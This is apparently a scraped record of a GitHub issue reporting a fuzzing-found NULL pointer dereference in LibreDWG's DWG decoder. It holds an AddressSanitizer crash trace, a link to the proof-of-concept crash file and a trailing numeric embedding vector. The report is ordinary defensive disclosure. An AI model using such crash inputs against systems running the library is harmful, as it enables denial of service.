dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.01740359514951706, 0.021769294515252113, -0.004561784211546183, 0.01534653827548027, 0.05117486044764519, 0.05413465574383736, -0.01749238930642605, 0.04513687640428543, -0.019031483680009842, 0.02770368382334709, -0.011979770846664906, 0.0011811433359980583, 0.012186956591904163, 0.012172157876193523, -0.011173226870596409, 0.014465998858213425, -0.0032742733601480722, 0.007710266392678022, -0.023500774055719376, -0.027644487097859383, 0.02785167284309864, -0.005446023307740688, -0.01741839572787285, 0.020703768357634544, -0.025276651605963707, 0.0044285934418439865, -0.006271066144108772, -0.007643671240657568, -0.018010353669524193, 0.01735919900238514, 0.01389623899012804, 0.022376051172614098, 0.017921559512615204, 0.000869902316480875, 0.03767819330096245, -0.010396280325949192, 0.04407135024666786, 0.060113441199064255, 0.013274681754410267, 0.03457040712237358, 0.005586613435298204, -0.07369890064001083, -0.021340124309062958, 0.014295810833573341, -0.011846580542623997, -0.009123568423092365, 0.029050389304757118, 0.01621967740356922, -0.013304279185831547, -0.001990462187677622, -0.011410010978579521, -0.0173444002866745, -0.035162366926670074, -0.07381729036569595, 0.042709846049547195, -0.01740359514951706, 0.03356407955288887, 0.021828489378094673, 0.004706074483692646, -0.006411656271666288, -0.017906760796904564, 0.0309002622961998, -0.0034259629901498556, 0.02770368382334709, 0.006914821453392506, 0.020718567073345184, -0.039986833930015564, 0.007558577228337526, -0.027600090950727463, -0.005760501604527235, 0.004302802495658398, -0.044781703501939774, -0.004550685174763203, 0.027259714901447296, 0.021680500358343124, -0.0068704248405992985, 0.01153580192476511, 0.011787384748458862, -0.016782039776444435, 0.022568438202142715, -0.013074895367026329, 0.04238426685333252, -0.03542874753475189, 0.017640380188822746, 0.007462383713573217, 0.006263666786253452, -0.021887686103582382, -0.08399898558855057, -0.006259967107325792, -0.04552165046334267, -0.00456918403506279, 0.03069307655096054, 0.024773485958576202, -0.008768393658101559, 0.0171964094042778, -0.0110400365665555, -0.039986833930015564, -0.01744799315929413, -0.04806707426905632, -0.011151028797030449, -0.03841814026236534, -0.005616211332380772, -0.011143629439175129, 0.011565400287508965, 0.03193619102239609, 0.01845432259142399, 0.003105935174971819, -0.016515657305717468, 0.006026883143931627, 0.1129457876086235, 0.0014512245543301105, -0.008746194653213024, -0.03853653371334076, -0.00648935092613101, -0.006959218531847, 0.009441746398806572, 0.03732301667332649, -0.007969249039888382, -0.05744962394237518, -0.024388711899518967, 0.0010627515148371458, -0.03202498331665993, -0.028414033353328705, 0.004151112865656614, -0.04812626913189888, 0.03625749051570892, 0.006600343156605959, -0.01718161068856716, -0.022775623947381973, -0.013289480470120907, -0.024462707340717316, -0.03661266714334488, 0.017921559512615204, -0.020644571632146835, 0.010211293585598469, 0.004121514968574047, -0.030071519315242767, 0.03075227327644825, 0.0163972657173872, 0.005638409871608019, -0.057124048471450806, -0.04155552387237549, 0.03380086272954941, -0.010810651816427708, -0.02971634455025196, 0.0005031651817262173, -0.04223627969622612, 0.011447007767856121, 0.0020977549720555544, -0.011003038845956326, -0.017803167924284935, -0.024699490517377853, 0.009952311404049397, 0.03161061182618141, 0.04259145259857178, -0.020052611827850342, 0.02008221112191677, 0.04537365958094597, 0.008723996579647064, -0.026356976479291916, 0.018543116748332977, -0.03075227327644825, 0.025750217959284782, -0.036020707339048386, -0.025572631508111954, -0.0001960864319698885, 0.01741839572787285, 0.022627634927630424, -0.005967687349766493, 0.025261852890253067, 0.0008833138854242861, -0.01650085859000683, 0.027318909764289856, 0.018084349110722542, -0.05892952159047127, 0.002769258338958025, -0.011802183464169502, 0.020792560651898384, -0.014036828652024269, -0.012889908626675606, 0.003370466874912381, 0.00725889764726162, 0.018957488238811493, -0.0012153659481555223, 0.016959626227617264, 0.004384196829050779, 0.031018653884530067, -0.005464522168040276, -0.00676313228905201, -0.0345408096909523, 0.00410671578720212, -0.009301156736910343, 0.004128914326429367, -0.02305680513381958, 0.04111155495047569, -0.0192386694252491, -0.04031240940093994, -0.016056889668107033, 0.010063303634524345, -0.01155060064047575, 0.007762062828987837, 0.011461807414889336, -0.02006741240620613, 0.014843372628092766, -0.006259967107325792, 0.002149551175534725, -0.014924767427146435, 0.04688315466046333, -0.001673209248110652, -0.03199538588523865, -0.013104493729770184, -0.034156035631895065, 0.017729174345731735, -0.005386827513575554, -0.02589820884168148, 0.002943146275356412, -0.015716511756181717, 0.029553554952144623, -0.035162366926670074, 0.0007205251604318619, 0.027422502636909485, -0.021369721740484238, 0.007099808659404516, 0.00299864262342453, -0.07831618189811707, -0.010729257948696613, 0.007910052314400673, 0.010270489379763603, -0.04540325701236725, 0.004813367035239935, 0.035991109907627106, -0.02987913228571415, -0.007902652956545353, 0.018631910905241966, -0.02585381083190441, -0.010448076762259007, -0.002636067569255829, 0.013851841911673546, -0.030056720599532127, 0.01744799315929413, 0.022790422663092613, 0.02496587298810482, -0.01716681197285652, -0.017803167924284935, 0.010877247899770737, 0.0463503934442997, -0.009389949962496758, -0.004361998289823532, -0.029065189883112907, 0.02770368382334709, 0.009878316894173622, -0.030604282394051552, 0.007551177404820919, 0.022701628506183624, 0.013600259087979794, -0.011099232360720634, 0.02791086956858635, 0.018543116748332977, -0.014273612760007381, -0.037027038633823395, 0.03770779073238373, 0.001366130542010069, -0.012083363719284534, -0.0010072552831843495, 0.007458684034645557, -0.016545254737138748, -0.03075227327644825, 0.021428916603326797, -0.01836553029716015, -0.029050389304757118, 0.046202402561903, -0.014140421524643898, -0.002290141535922885, -0.007166404277086258, -0.0249954704195261, 0.0081986328586936, 0.04131874069571495, 0.0025139760691672564, -0.00456548435613513, 0.0016454611904919147, -0.0015474179526790977, 0.027481699362397194, -0.0192386694252491, 0.01056646928191185, -0.009301156736910343, -0.018572714179754257, -0.009456546045839787, -0.02879880741238594, -0.032143376767635345, -0.00962673407047987, -0.0006035207188688219, 0.008280026726424694, -0.05357229337096214, -0.0036645964719355106, -0.012712320312857628, 0.0386253260076046, 0.013600259087979794, -0.012608727440237999, -0.05585133656859398, -0.0002091511560138315, -0.02205047383904457, -0.01203156728297472, -0.021399319171905518, -0.018883492797613144, -0.020910954102873802, -0.0025028767995536327, -0.017595982179045677, 0.02028939686715603, -0.01744799315929413, -0.007702867034822702, 0.02020060271024704, -0.048718228936195374, -0.009116169065237045, -0.029583152383565903, -0.025720620527863503, -0.007284795865416527, 0.015834905207157135, -0.046735167503356934, -0.011017837561666965, 0.0025417241267859936, -0.04356818646192551, -0.004798567853868008, -0.033090509474277496, 0.006178572308272123, 0.03951326757669449, -0.038921307772397995, 0.0059639872051775455, 0.04966536536812782, -0.054193850606679916, 0.0239743422716856, 0.014443800784647465, -0.018084349110722542, -0.004724573343992233, -0.01547972857952118, -0.003285372629761696, -0.048718228936195374, -0.05114526301622391, 0.023604366928339005, 0.01641206443309784, -0.0033334693871438503, -0.012120361439883709, 0.02592780627310276, 0.0020922052208334208, -0.006237768568098545, 0.007836057804524899, -0.02968674525618553, 0.00907177198678255, -0.020822159945964813, 0.019431056454777718, -0.010943843051791191, 0.0010174296330660582, 0.04928059130907059, -0.020629772916436195, 0.03770779073238373, -0.0010026306845247746, -0.028325241059064865, 0.002835853723809123, -0.04738632217049599, 0.012379343621432781, -0.0032668740022927523, 0.002769258338958025, -0.013304279185831547, 0.00042708919500000775, 0.002802556147798896, 0.011151028797030449, 0.011772585101425648, 0.008487212471663952, 0.005420125089585781, -0.003350118175148964, -0.001197792124003172, -0.03427442908287048, 0.05558495596051216, -0.038033369928598404, -0.029139183461666107, -0.018720705062150955, -0.026342177763581276, 0.025158260017633438, 0.023485975340008736, -0.03344568610191345, 0.004321300890296698, -0.04244346171617508, -0.009737726300954819, -0.002835853723809123, -0.036050304770469666, 0.02986433357000351, 0.034244831651449203, -0.02219846472144127, 0.03880291432142258, -0.023337984457612038, -0.02896159701049328, -0.008435416035354137, 0.06511549651622772, -0.007092409301549196, -0.04626160115003586, 0.011698590591549873, 0.04128914326429367, -0.010314886458218098, -0.004791168496012688, 0.009101370349526405, -0.03433362394571304, -0.01941625587642193, 0.011927974410355091, -0.01441420242190361, -0.009789522737264633, 0.020407788455486298, 0.035132769495248795, 0.009878316894173622, -0.014199617318809032, 0.01846912130713463, 0.013992431573569775, 0.003605400677770376, -0.018587514758110046, -0.002595370402559638, 0.005668007768690586, 0.05280274525284767, 0.014902569353580475, -0.00773986428976059, 0.01436980627477169, -0.014673184603452682, -0.010218692943453789, 0.0025343247689306736, -0.012223954312503338, 0.012778915464878082, 0.011328616179525852, 0.007458684034645557, 0.023781955242156982, -0.012690122239291668, 0.016915230080485344, 0.01641206443309784, -0.035931915044784546, -0.0031466323416680098, 0.024462707340717316, 0.007040612865239382, 0.033268097788095474, -0.022390851750969887, -0.043686576187610626, -0.01846912130713463, -0.02592780627310276, -0.008827589452266693, 0.007269997149705887, 0.0020034112967550755, 0.044752102345228195, -0.0240483358502388, -0.005101947113871574, -0.011905776336789131, -0.02970154583454132, -0.046468786895275116, 0.003858833108097315, 0.015849703922867775, -0.039779648184776306, 0.001229239976964891, 0.030175112187862396, -0.03631668910384178, 0.001944215502589941, 0.0034648103173822165, -0.018661508336663246, -0.052299581468105316, 0.0035980010870844126, 0.02873961254954338, 0.008450215682387352, -0.011691191233694553, 0.019741835072636604, -0.024270320311188698, -0.004828165750950575, 0.020822159945964813, 0.03741181269288063, 0.04626160115003586, -0.03951326757669449, 0.0017971507040783763, -0.005627310834825039, -0.01394063513725996, 0.01817314326763153, 0.017699575051665306, -0.008317024447023869, 0.0016917079919949174, 0.02020060271024704, -0.02483268268406391, 0.004225107841193676, -0.010314886458218098, -0.012216554954648018, 0.004325000569224358, -0.04096356779336929, -0.004802267532795668, -0.028488028794527054, 0.02686014212667942, -0.020585374906659126, 0.052595559507608414, 0.015405734069645405, 0.023737557232379913, 0.041851505637168884, -0.0033982149325311184, 0.01614568382501602, -0.027392905205488205, -0.04933978617191315, 0.0023474874906241894, 0.030337901785969734, -0.01352626457810402, -0.03492558375000954, 0.04046040028333664, 0.02015620470046997, 0.0287840086966753, -0.0008301300695165992, 0.026416173204779625, 0.00008359109051525593, 0.034126438200473785, -0.016574854031205177, -0.0290059931576252, 0.0017879012739285827, -0.0013411572435870767, -0.03560633584856987, 0.01061086542904377, -0.023841150104999542, 0.002599070081487298, -0.05700565502047539, -0.007466083392500877, -0.016560053452849388, 0.002162500284612179, 0.008324423804879189, 0.009981909766793251, 0.009922713041305542, -0.016515657305717468, -0.031137045472860336, -0.004828165750950575, 0.046616774052381516, 0.01533173955976963, 0.014244014397263527, -0.003544354811310768, -0.007310694083571434, 0.022775623947381973, -0.01401463057845831, -0.0032335761934518814, -0.003133683232590556, -0.012164758518338203, 0.037145428359508514, -0.009190164506435394, 0.015997692942619324, -0.011580199003219604, 0.0299531277269125, 0.007096108980476856, -0.016012491658329964, -0.018957488238811493, 0.0249954704195261, -0.03684945032000542, 0.0006543922354467213, -0.015080156736075878, 0.01738879643380642, -0.019993416965007782, 0.035043977200984955, 0.001983062829822302, -0.012238753028213978, -0.004506288096308708, -0.006748333107680082, -0.002663815626874566, 0.00028927373932674527, -0.006189671810716391, 0.010048504918813705, -0.004805967677384615, -0.0006132325506769121, 0.029287174344062805, 0.0057272035628557205, 0.02111813984811306, -0.0004842040070798248, 0.023737557232379913, -0.004243606235831976, 0.012897307984530926, 0.00429910235106945, -0.017507188022136688, 0.02890240028500557, -0.03744141012430191, -0.030989056453108788, 0.03359367698431015, 0.021724896505475044, 0.01722600869834423, -0.02123653143644333, -0.022612836211919785, 0.005601412616670132, -0.02493627555668354, -0.0054867202416062355, -0.001158019877038896, -0.03184739500284195, 0.013511464931070805, -0.04720873385667801, -0.011136229149997234, 0.016737641766667366, 0.013962834142148495, -0.02506946586072445, 0.007910052314400673, -0.017536787316203117, 0.034244831651449203, -0.01108443271368742, 0.006074979901313782, -0.009463945403695107, -0.001638061716221273, -0.0030837366357445717, 0.03092985972762108, 0.005882592871785164, 0.0007413362036459148, 0.013711251318454742, -0.009301156736910343, 0.0031281334813684225, -0.013304279185831547, 0.015583321452140808, 0.017729174345731735, -0.0201858039945364, -0.03374166414141655, -0.0011783684603869915, 0.012260952033102512, -0.005856694653630257, -0.02409273386001587, 0.017004024237394333, 0.034096840769052505, 0.0016445362707599998, 0.07079830020666122, -0.0026194187812507153, 0.020925752818584442, -0.0005202764878049493, 0.0011709689861163497, 0.010670062154531479, -0.024211125448346138, 0.010396280325949192, 0.016604451462626457, -0.04238426685333252, 0.013607658445835114, 0.019771432504057884, 0.015272543765604496, 0.032261766493320465, 0.007225600071251392, -0.02395954169332981, -0.011091833002865314, -0.005549616180360317, -0.02691933698952198, 0.018735503777861595, 0.012098163366317749, -0.02221326343715191, -0.020836958661675453, 0.03551754355430603, 0.04685355722904205, 0.008043243549764156, -0.014318009838461876, 0.014155220240354538, 0.011454407125711441, 0.00025597604690119624, -0.009582336992025375, 0.013400472700595856, -0.027466900646686554, -0.0052462369203567505, 0.000717750343028456, 0.01817314326763153, 0.021428916603326797, 0.03489598631858826, -0.026312580332159996, -0.014162620529532433, 0.0007584475097246468, 0.01926826685667038, 0.019046282395720482, -0.015553724020719528, 0.02595740370452404, 0.03868452459573746, -0.0035721028689295053, 0.0072514982894063, 0.007466083392500877, -0.014362405985593796, -0.035073574632406235, 0.0010303787421435118, -0.011484005488455296, 0.0013411572435870767, -0.03954286500811577, -0.001158944796770811, 0.020733365789055824, 0.01934226229786873, -0.001845247345045209, -0.02111813984811306, 0.006681737955659628, -0.0009425097960047424, -0.01151360385119915, -0.0028173550963401794, 0.0037663395050913095, 0.015131953172385693, -0.030574684962630272, 0.005668007768690586, -0.004950257483869791, -0.0027803576085716486, -0.0004902160726487637, 0.004014222417026758, -0.030367499217391014, 0.01056646928191185, -0.007917452603578568, -0.010625665076076984, -0.02197648026049137, -0.032084181904792786, 0.020866556093096733, 0.0005489495233632624, 0.017507188022136688, 0.004546985495835543, 0.026297779753804207, -0.017965957522392273, 0.04146673157811165, -0.022612836211919785, -0.02496587298810482, 0.004491489380598068, -0.02304200641810894, -0.0006460677832365036, 0.008783192373812199, -0.008709197863936424, 0.012786315754055977, 0.010359283536672592, -0.007939650677144527, -0.010492473840713501, 0.0326465405523777, 0.005290633998811245, -0.02387074939906597, -0.00047911686124280095, -0.03835894539952278, -0.018720705062150955, 0.0050057535991072655, -0.01619007997214794, 0.013629857450723648, 0.0024381312541663647, -0.0032631743233650923, 0.009463945403695107, -0.012534732930362225, -0.014525194652378559, -0.00012012606748612598, -0.04327220469713211, 0.008916382677853107, -0.013171088881790638, 0.006182272452861071, -0.008361421525478363, -0.011010438203811646, 0.009426947683095932, 0.00907177198678255, -0.019016684964299202, 0.005664308089762926, 0.014103423804044724, -0.02794046700000763, 0.004776369780302048, 0.008857186883687973, -0.019771432504057884, 0.01488776970654726, 0.004003122914582491, 0.0035277060233056545, -0.00023470251471735537, 0.0063043637201189995, -0.020378191024065018, -0.008812790736556053, -0.005068649537861347, 0.010433278046548367, 0.015953296795487404, -0.01826193742454052, 0.027333708480000496, 0.007821259088814259, 0.008635202422738075, 0.023619165644049644, -0.0403716079890728, -0.01010030135512352, -0.015583321452140808, 0.03199538588523865, -0.03202498331665993, -0.007225600071251392, -0.013230284675955772, -0.029139183461666107, 0.010699659585952759, -0.011003038845956326, 0.03285372629761696, 0.03229136765003204, -0.0003965663199778646, 0.01638246700167656, -0.030397096648812294, 0.016027290374040604, 0.008516810834407806, 0.033327292650938034, -0.008294826373457909, -0.00020186728215776384, -0.004743071738630533, 0.01925346814095974, -0.02212446928024292, 0.009404749609529972, 0.005357229150831699, 0.02580941468477249, 0.025631826370954514, -0.016042090952396393, -0.014436401426792145, -0.029612751677632332, 0.023308387026190758, 0.011839181184768677, -0.00744758453220129, 0.03374166414141655, -0.014465998858213425, -0.0004263955052010715, -0.00205335789360106, -0.005982486065477133, -0.02501026913523674, 0.039779648184776306, -0.01533173955976963, -0.008990378119051456, -0.03347528353333473, 0.022820021957159042, 0.02583901211619377, -0.0011487705633044243, -0.022760825231671333, 0.030604282394051552, -0.006463452707976103, -0.03368246927857399, -0.024758687242865562, -0.007077610120177269, -0.02410753257572651, -0.04487049579620361, 0.0349847786128521, -0.024743888527154922, 0.02600180171430111, -0.0060527813620865345, -0.009560138918459415, 0.018927890807390213, 0.03753020241856575, -0.004147413186728954, 0.002554673235863447, 0.0018961188616231084, -0.018025152385234833, 0.0013559561921283603, 0.0034333625808358192, -0.030234308913350105, 0.0016519357450306416, -0.008065441623330116, -0.05996545031666756, -0.007836057804524899, -0.03679025545716286, -0.0007626097649335861, 0.011979770846664906, 0.034126438200473785, 0.005675407126545906, 0.001880394876934588, -0.0023289888631552458, -0.016944827511906624, 0.002114403760060668, 0.0073550911620259285, 0.026475368067622185, 0.02317519672214985, -0.011210224591195583, -0.0023067903239279985, 0.046498384326696396, -0.0259426049888134, -0.005668007768690586, -0.014769378118216991, -0.010255690664052963, -0.022080073133111, -0.02592780627310276, -0.024669893085956573, 0.005090847611427307, 0.011772585101425648, 0.007543778046965599, 0.04353858903050423, 0.02899119444191456, -0.0129713024944067, -0.006733533926308155, -0.009930113330483437, 0.012704920955002308, 0.007954449392855167, -0.0035055074840784073, -0.0004916035104542971, -0.010980839841067791, 0.03261694312095642, -0.005619911011308432, -0.006178572308272123, -0.006115676835179329, 0.0027822074480354786, 0.01547972857952118, -0.015849703922867775, -0.03258734568953514, 0.0011413710890337825, -0.014073826372623444, -0.03587271645665169, -0.02410753257572651, 0.017092816531658173, 0.009019975550472736, -0.023530371487140656, -0.03285372629761696, -0.011262021027505398, -0.01389623899012804, 0.023574769496917725, 0.030604282394051552, -0.012253552675247192, -0.004961356520652771, -0.0010396280558779836, 0.032232169061899185, 0.013052697293460369, -0.07896734029054642, 0.012290549464523792, -0.019653040915727615, -0.011454407125711441, -0.018025152385234833, 0.004558084532618523, 0.028088456019759178, -0.050316520035266876, -0.03187699615955353, 0.0326465405523777, 0.03868452459573746, -0.0028118055779486895, -0.018898293375968933, -0.029050389304757118, -0.007384689059108496, -0.013992431573569775, -0.0031965789385139942, 0.034688800573349, -0.025202656164765358, 0.0039328280836343765, -0.018528318032622337, 0.03152181953191757, -0.0002582883753348142, 0.007410587277263403, 0.025187857449054718, 0.02006741240620613, -0.005423824768513441, 0.0003910166851710528, -0.03838854283094406, -0.021724896505475044, -0.0028821006417274475, -0.041851505637168884, -0.001126572024077177, 0.02132532373070717, 0.06434594839811325, 0.012327547185122967, -0.009819121100008488, -0.03255774825811386, 0.012120361439883709, -0.007499380968511105, -0.03092985972762108, -0.0349847786128521, 0.011195425875484943, -0.0005757726612500846, 0.0029468461871147156, 0.004247306380420923, -0.008723996579647064, 0.013134091161191463, 0.011927974410355091, 0.029316771775484085, 0.008435416035354137, 0.006370959337800741, 0.004376797005534172, -0.008975579403340816, -0.03966125473380089, -0.017063219100236893, 0.015686914324760437, 0.0287840086966753, -0.01836553029716015, 0.0007579850498586893, 0.002730411011725664, 0.002547273878008127, -0.013777846470475197, -0.012445938773453236, -0.01152840256690979, -0.014103423804044724, -0.01746279187500477, -0.0035332555416971445, -0.012394142337143421, -0.011180626228451729, 0.019046282395720482, -0.019815828651189804, -0.01155060064047575, -0.0026083195116370916, 0.02503986842930317, 0.004543285816907883, 0.023471176624298096, -0.020392989739775658, -0.019475452601909637, 0.006089778617024422, 0.03252815082669258, -0.04418974369764328, -0.013696452602744102, -0.022864418104290962, -0.02024499885737896, -0.013711251318454742, 0.007784261368215084, 0.035902317613363266, 0.019519848749041557, -0.015228146687150002, 0.024788284674286842, -0.017936358228325844, -0.013074895367026329, -0.012786315754055977, 0.013733450323343277, -0.019697437062859535, 0.012327547185122967, 0.018543116748332977, -0.015228146687150002, -0.01152100320905447, -0.005309132859110832, 0.016885632649064064, 0.02797006443142891, -0.002454780275002122, -0.020037813112139702, -0.006430155131965876, -0.0019941620994359255, 0.031285036355257034, -0.030367499217391014, 0.005738303065299988, -0.000698789139278233, 0.0010831000981852412, -0.02604619786143303, -0.011920575052499771, 0.009560138918459415, -0.021369721740484238, -0.010411079972982407, 0.025439439341425896, -0.02014140598475933, -0.029301973059773445, 0.0073550911620259285, -0.011210224591195583, 0.019534649327397346, 0.0006516174180433154, -0.006082379259169102, -0.0041918097995221615, 0.000956383824814111, 0.03824055567383766, -0.02986433357000351, 0.0171964094042778, -0.018853895366191864, -0.026519766077399254, 0.006626241374760866, 0.003925428260117769, 0.03072267398238182, -0.02678614668548107, 0.0019405157072469592, -0.009826520457863808, -0.005386827513575554, 0.010322285816073418, 0.01153580192476511, -0.005982486065477133, -0.019623441621661186, 0.02577981725335121, -0.0018655959283933043, -0.0076880683191120625, 0.010980839841067791, 0.002663815626874566, 0.006892622914165258, -0.0173444002866745, 0.0007737089763395488, 0.01835072971880436, -0.015287342481315136, -0.021488113328814507, 0.011920575052499771, 0.04901421070098877, -0.0029098486993461847, -0.029568353667855263, 0.003906929865479469, -0.00915316678583622, 0.012660523876547813, -0.0014650985831394792, -0.004850364290177822, 0.018617112189531326, -0.035103172063827515, 0.021754495799541473, 0.010189095512032509, 0.04259145259857178, -0.020511381328105927, -0.009012576192617416, 0.003690494690090418, 0.0001610544859431684, -0.019475452601909637, 0.011121430434286594, -0.006703936029225588, -0.018676307052373886, -0.02483268268406391, 0.007070210762321949, -0.02795526571571827, -0.028443632647395134, -0.01402202993631363, -0.0025750219356268644, 0.01057386863976717, -0.004872562829405069, -0.0059935855679214, -0.006829727441072464, 0.03335689380764961, -0.025321047753095627, -0.00347775942645967, 0.0405195951461792, -0.02582421340048313, 0.011299018748104572, 0.0006770531763322651, -0.021414117887616158, -0.03300171718001366, -0.017004024237394333, -0.004924359265714884, -0.006578145083039999, 0.02020060271024704, -0.03075227327644825, 0.010381481610238552, 0.01641206443309784, -0.002118103438988328, 0.011705989949405193, 0.006234068889170885, -0.020748164504766464, -0.009330754168331623, 0.012882508337497711, -0.01811394654214382, -0.01817314326763153, -0.011898376978933811, 0.006496750749647617, 0.10163936764001846, -0.015879301354289055, 0.003065238008275628, -0.019889824092388153, 0.0031669808086007833, 0.008945981040596962, 0.003818135941401124, 0.01546492986381054, -0.010869847610592842, -0.007466083392500877, 0.026297779753804207, -0.019653040915727615, -0.019075879827141762, 0.007858255878090858, 0.022538840770721436, -0.0010026306845247746, -0.010418479330837727, -0.01912027783691883, 0.034067243337631226, -0.00961193535476923, 0.026120193302631378, -0.0054867202416062355, 0.014798976480960846, -0.02031899429857731, 0.025261852890253067, -0.0017277804436162114, -0.03474799543619156, -0.021621303632855415, -0.012808513827621937, -0.015968095511198044, -0.0062969643622636795, -0.0010960492072626948, -0.013200686313211918, -0.01153580192476511, 0.0003392202779650688, 0.001193167408928275, 0.021724896505475044, 0.008539008907973766, -0.03380086272954941, -0.003984624519944191, 0.0034000647719949484, -0.004132614005357027, -0.019978618249297142, -0.011158428154885769, 0.02512866072356701, -0.012297948822379112, 0.0480966717004776, 0.002399283926934004, -0.018883492797613144, -0.012290549464523792, 0.0024085333570837975, -0.013356075622141361, 0.03652387484908104, 0.022080073133111, 0.018631910905241966, 0.02896159701049328, 0.011831781826913357, -0.005109346471726894, -0.008250429295003414, -0.022731227800250053, -0.010744056664407253, 0.012579130008816719, -0.00742538645863533, -0.0016593352193012834, 0.02678614668548107, -0.016841234639286995, -0.0387733168900013, -0.004043820314109325, -0.02132532373070717, 0.030485890805721283, 0.006851925980299711, 0.011299018748104572, -0.0041733114048838615, -0.011299018748104572, 0.02313080057501793, 0.006996215786784887, 0.01543533243238926, 0.028414033353328705, -0.014636187814176083, -0.017877163365483284, 0.021724896505475044, 0.02993832901120186, 0.00457288371399045, 0.02884320542216301, -0.014103423804044724, 0.0290059931576252, -0.008857186883687973, -0.0073661901988089085, -0.002656416269019246, 0.001806400017812848, 0.005516318138688803, 0.002865451853722334, 0.020984947681427002, -0.0015520426677539945, 0.005286934319883585, 0.025306249037384987, 0.021843288093805313, -0.006663239095360041, -0.012186956591904163, -0.015746111050248146, 0.004432293586432934, -0.017640380188822746, 0.02388554811477661, -0.0034222633112221956, 0.0008167185005731881, 0.008982978761196136, -0.011343414895236492, 0.015538925305008888, 0.007488281931728125, -0.02320479415357113, -0.03489598631858826, -0.020037813112139702, 0.012320147827267647, -0.011735588312149048, -0.007895253598690033, 0.03838854283094406, 0.005660608410835266, -0.013615057803690434, -0.01914987526834011, -0.033031314611434937, -0.007969249039888382, -0.029331570491194725, 0.048481445759534836, -0.01839512772858143, -0.0003117034211754799, 0.003170680720359087, -0.005764201283454895, -0.01343747042119503, 0.023855948820710182, 0.016722843050956726, 0.022731227800250053, 0.004054919350892305, 0.008975579403340816, -0.023367583751678467, 0.011691191233694553, -0.029420364648103714, 0.023811552673578262, 0.015124553814530373, 0.006315463222563267, -0.007569676265120506, -0.014525194652378559, 0.02406313456594944, 0.02703772857785225, -0.0038810314144939184, 0.011395211331546307, -0.004802267532795668, 0.007103508338332176, 0.0020959048997610807, 0.0058270967565476894, 0.03356407955288887, -0.0019220170797780156, -0.021813690662384033, 0.010203894227743149, 0.019756633788347244, -0.008302225731313229, 0.015146751888096333, 0.01012249942868948, -0.018853895366191864, -0.0008754519512876868, 0.0006423680461011827, 0.005079748574644327, 0.00007231843483168632, 0.015538925305008888, -0.0011339714983478189, -0.008413217961788177, 0.028443632647395134, 0.007388388738036156, -0.05111566185951233, -0.021902484819293022, -0.02782207541167736, -0.002008961047977209, -0.0015085706254467368, -0.008413217961788177, -0.0030245408415794373, 0.026608558371663094, -0.006615142337977886, 0.0007894329028204083, 0.026253383606672287, 0.022701628506183624, -0.03377126529812813, 0.008035844191908836, 0.019653040915727615, 0.026179388165473938, 0.01929786428809166, 0.009212362580001354, -0.028325241059064865, -0.007747264113277197, 0.0037404412869364023, -0.02212446928024292, 0.011594997718930244, 0.017906760796904564, 0.05164842680096626, -0.00870179757475853, -0.013363475911319256, -0.004032720811665058, -0.016086487099528313, -0.021547310054302216, -0.0009124493808485568, -0.013955434784293175, 0.02307160384953022, 0.006444954313337803, -0.01438460499048233, 0.00031424700864590704, 0.0016371366800740361, -0.0022364952601492405, -0.02508426457643509, 0.0035573039203882217, 0.012919506058096886, -0.002726711332798004, -0.005797498859465122, -0.0067705316469073296, 0.01056646928191185, 0.0063006640411913395, -0.020822159945964813, -0.01391103770583868, -0.002158800605684519, 0.0024085333570837975, -0.007414286956191063, 0.007762062828987837, -0.002144001657143235, 0.0031651309691369534, 0.025380244478583336, 0.00915316678583622, 0.006937019992619753, -0.002587971044704318, 0.002321589272469282, 0.04013482481241226, -0.03969085216522217, -0.002700813114643097, -0.0008611154044046998, -0.023619165644049644, -0.013407872058451176, -0.01650085859000683, 0.009227161295711994, -0.01647126115858555, -0.024625496938824654, 0.026253383606672287, 0.005383127368986607, -0.012645725160837173, -0.012445938773453236, 0.0031521818600594997, 0.0012865859316661954, -0.017521988600492477, 0.014539994299411774, -0.005286934319883585, -0.00024163952912203968, -0.0015862652799114585, -0.009530540555715561, -0.007306994404643774, 0.01941625587642193, -0.004935458768159151, -0.0024695792235434055, 0.005601412616670132, -0.0063931578770279884, -0.013134091161191463, 0.020600175485014915, 0.01713721454143524, -0.0023715358693152666, 0.02881360612809658, 0.004731972701847553, 